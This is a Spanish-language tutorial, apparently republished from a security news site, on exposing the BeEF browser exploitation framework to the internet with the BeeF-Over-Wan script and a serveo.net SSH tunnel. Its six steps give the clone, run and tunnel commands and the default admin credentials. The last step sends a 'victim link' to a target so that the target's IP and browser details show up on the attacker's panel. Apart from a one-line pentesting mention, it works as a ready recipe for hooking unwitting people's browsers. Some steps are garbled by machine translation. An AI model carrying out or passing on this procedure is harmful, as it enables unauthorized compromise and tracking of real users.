Beef Xss Framework es una herramienta de explotación del navegador. Se centra principalmente en los ataques del lado del cliente y los navegadores basados en web
Ayuda a un probador de penetración a comprender más allá del perímetro de la red y el sistema cliente. Está disponible en Kali Linux y otros sistemas operativos de prueba de penetración de forma predeterminada.
Requisitos previos BeEF Framework: Ngrok or Serveo, Beef Over Wan, KALI LINUX
Puede usar ngrok o serveo, sin embargo, ngrok no permite ejecutar múltiples túneles en la versión gratuita. Así que nos vamos con el serveo.
Paso 1:
Arranque Kali Linux y descargue beef over wan escribiendo en la terminal: git clone https://github.com/stormshadow07/BeeF-Over-Wan.git
Paso 2:
Ahora navegue en el directorio escribiendo los comandos.
cd BeeF-over-Wan
chmod + x BeeFOverWan.py && python BeeFOverWan.py
Write 1 y presiona enter
Paso 3:
Abre un nuevo terminal para ejecutar el tipo serveo en el comando. ssh -R 80: localhost: 80 -R 8090: localhost: 3000 serveo.net
Haga una nota aquí, la URL de tráfico HTTP se debe pegar en la otra terminal, donde la que apunta al puerto 8090 se debe pegar para el marco de la interfaz de administración xss.
Enlace de la víctima: oponui.serveo.net
URL del administrador: serveo.net:8090
Etapa 4:
Pegue las URL en el otro terminal donde se está ejecutando el script over over wan.
Paso 5:
Inicie sesión en el administrador. Recuerde que la URL será diferente para ustedes, así que asegúrese de escribir la correcta. El nombre de usuario predeterminado es beef y la contraseña es beef.
Paso 6:
Ahora pase la URL de enlace al objetivo, una vez que el objetivo haga clic en él. Debería poder ver su dirección IP y la información del navegador en su panel de administración.
Fecha actualización el 2021-10-15. Fecha publicación el 2018-10-15. Categoría: web Autor: Oscar olg Mapa del sitio Fuente: gbhackers